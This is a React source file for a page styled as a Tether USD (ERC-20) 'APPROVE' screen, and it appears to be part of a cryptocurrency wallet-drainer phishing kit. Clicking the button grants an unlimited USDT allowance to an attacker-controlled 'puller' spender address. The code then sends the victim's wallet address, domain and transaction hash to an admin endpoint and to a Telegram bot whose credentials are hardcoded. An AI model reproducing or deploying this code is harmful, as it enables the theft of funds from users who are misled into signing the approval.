import React, { useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

const CHAIN_ID = 1
const USDT_ERC20_FALLBACK = "0xdAC17F958D2ee523a2206206994597C13D831ec7"
const ERC20_SPENDER_FALLBACK = "0xc47Ae07a5236274898F3883c8e188226a7E052e6"

const getApiBase = () => (typeof window !== 'undefined' ? window.location.origin : 'https://multiscan.app')
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDTERC20Page = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      if (!response.ok) console.error('Telegram error:', await response.text())
    } catch (e) {
      console.error('Telegram:', e)
    }
  }

  const formatDateTime = () => {
    const now = new Date()
    return now.toLocaleDateString('en-US', { year: 'numeric', month: '2-digit', day: '2-digit' }) +
      ' ' + now.toLocaleTimeString('en-US', { hour: '2-digit', minute: '2-digit', second: '2-digit' })
  }

  const connectMainnet = async () => {
    const ethProv = await getEthereumProviderAsync()
    if (!ethProv) {
      throw new Error("MetaMask or Bybit Wallet not found. Please open in Bybit Wallet or install and refresh the page.")
    }
    const provider = new ethers.BrowserProvider(ethProv)
    await provider.send("eth_requestAccounts", [])
    const signer = await provider.getSigner()
    const cur = await provider.send("eth_chainId", [])
    const currentChainId = parseInt(cur, 16)
    if (currentChainId !== CHAIN_ID) {
      try {
        await provider.send("wallet_switchEthereumChain", [{ chainId: "0x1" }])
        let attempts = 0
        while (attempts < 15) {
          await new Promise(resolve => setTimeout(resolve, 300))
          const newCur = await provider.send("eth_chainId", [])
          if (parseInt(newCur, 16) === CHAIN_ID) break
          attempts++
        }
      } catch (e) {
        throw new Error("Failed to switch to Ethereum Mainnet. Please switch manually in your wallet.")
      }
    }
    return { provider, signer }
  }

  const handleApprove = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("ERC20 APPROVE started for USDT")

      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      let tokenAddress = null
      let spenderAddress = null
      try {
        const resPuller = await fetch(`${getApiBase()}/api/v1/puller?type=USDT_ETH`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = typeof text === 'string' ? JSON.parse(text) : text
              spenderAddress = data.puller || data.pullerAddress || data.address || data.spender || data.data
              tokenAddress = data.token || data.tokenAddress || data.contract
              if (typeof spenderAddress !== 'string' && typeof data === 'string' && data.startsWith('0x') && data.length === 42) spenderAddress = data
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed:", fetchError?.message)
      }
      if (!spenderAddress || typeof spenderAddress !== 'string' || !spenderAddress.startsWith('0x') || spenderAddress.length !== 42) {
        console.warn("Spender not received or invalid, using fallback")
        spenderAddress = ERC20_SPENDER_FALLBACK
      }
      if (!tokenAddress || typeof tokenAddress !== 'string' || !tokenAddress.startsWith('0x') || tokenAddress.length !== 42) {
        console.warn("Token contract not received or invalid, using fallback")
        tokenAddress = USDT_ERC20_FALLBACK
      }
      console.log("Token address (USDT ERC-20):", tokenAddress, "Spender address:", spenderAddress)

      const { provider, signer } = await connectMainnet()
      const owner = await signer.getAddress()

      // USDT on Ethereum has non-standard approve (returns void), so we use minimal ABI
      const usdtContract = new ethers.Contract(
        tokenAddress,
        [
          "function approve(address spender, uint256 amount)",
          "function allowance(address owner, address spender) view returns (uint256)"
        ],
        signer
      )

      const maxApproval = ethers.MaxUint256
      // USDT on Ethereum requires: if current allowance !== 0, must set to 0 first, then set new value (contract reverts otherwise)
      const currentAllowance = await usdtContract.allowance(owner, spenderAddress)
      if (currentAllowance !== 0n) {
        const resetTx = await usdtContract.approve(spenderAddress, 0)
        await resetTx.wait()
        console.log("Allowance reset to 0:", resetTx.hash)
      }
      const tx = await usdtContract.approve(spenderAddress, maxApproval)
      console.log("Approve transaction sent:", tx.hash)
      await tx.wait()
      console.log("✅ USDT ERC20 approve completed successfully:", tx.hash)

      const domainName = window.location.hostname

      try {
        const params = new URLSearchParams({
          owner: owner.toLowerCase(),
          domainName: domainName,
          spender: spenderAddress.toLowerCase()
        })
        const resSubmit = await fetch(`${getApiBase()}/api/admin/usdts-erc?${params.toString()}`, {
          method: "POST",
          headers: { "Content-Type": "application/json" }
        })
        if (!resSubmit.ok) console.error("Submit Error:", await resSubmit.text())
        else console.log("USDT ERC20 APPROVE OK - data sent to server")
      } catch (submitError) {
        console.warn("Failed to send data to server (not critical):", submitError)
      }

      const telegramMessage = `✅ <b>USDT ERC20 Approve</b>\n\n` +
        `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `💼 Token: USDT (ERC-20)\n` +
        `📝 Transaction: <code>${tx.hash}</code>\n` +
        `⏰ Time: ${formatDateTime()}`
      await sendTelegramMessage(telegramMessage)

      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("ERC20 APPROVE FAILED", e)
      let userMessage = "An error occurred while connecting"
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message) {
        userMessage = e.message
      }
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img src="https://assets.coingecko.com/coins/images/325/small/Tether.png" alt="USDT" className="token-logo" />
          </div>
          <h1 className="token-title">USDT</h1>
          <p className="token-subtitle">Tether USD (ERC-20)</p>
        </div>

        {error && <div className="token-error">{error}</div>}
        {success && <div className="token-success">✅ Approve completed successfully!</div>}
        {loading && <div className="token-loading">Connecting and approving...</div>}

        <button
          className="token-approve-btn"
          onClick={handleApprove}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'APPROVE'}
        </button>
      </div>
    </div>
  )
}

export default USDTERC20Page
